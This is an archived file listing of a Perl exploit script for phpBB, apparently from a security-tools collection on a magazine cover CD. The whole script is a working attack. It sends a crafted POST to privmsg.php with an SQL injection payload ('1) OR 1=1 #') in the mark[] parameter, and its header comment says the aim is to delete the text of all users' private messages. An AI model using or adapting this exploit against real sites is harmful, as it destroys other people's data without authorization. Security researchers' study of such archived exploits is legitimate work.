home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / webapp / phpbb / phpbb-exploit.pl < prev    next >
Encoding:
Perl Script  |  2005-02-12  |  1.1 KB  |  39 lines
  1. #!/usr/bin/perl --
  2.  
  3. # phpBB delete the text of all users' private messages exploit
  4. # Ulf Harnhammar
  5. # January 2003
  6.  
  7. use Socket;
  8.  
  9. if (@ARGV != 2) { die "usage: $0 host sid\n"; }
  10.  
  11. ($host, $sid) = @ARGV;
  12. $host =~ s|\s+||g;
  13. $sid =~ s|\s+||g;
  14.  
  15. $crlf = "\015\012";
  16. $http = "POST /privmsg.php?folder=inbox&sid=$sid HTTP/1.0$crlf".
  17.         "Host: $host$crlf".
  18.         "User-Agent: Mozzarella/1.37++$crlf".
  19.         "Referer: http://www.phpbb.com/$crlf".
  20.         "Connection: close$crlf".
  21.         "Content-Type: application/x-www-form-urlencoded$crlf".
  22.         "Content-Length: 58$crlf$crlf".
  23.         "mode=&delete=true&mark%5B%5D=1%29+OR+1%3D1+%23&confirm=Yes";
  24.  
  25. $tcp = getprotobyname('tcp') or die "Couldn't getprotobyname!\n";
  26. $hosti = inet_aton($host) or die "Couldn't look up host!\n";
  27. $hosts = sockaddr_in(80, $hosti);
  28.  
  29. socket(SOK, PF_INET, SOCK_STREAM, $tcp) or die "Couldn't socket!\n";
  30. connect(SOK, $hosts) or die "Couldn't connect to port!\n";
  31.  
  32. select SOK; $| = 1; select STDOUT;
  33.  
  34. print SOK $http;
  35.  
  36. $junk = '';
  37. while (<SOK>) { $junk .= $_; }
  38.  
  39. close SOK or die "Couldn't close!\n";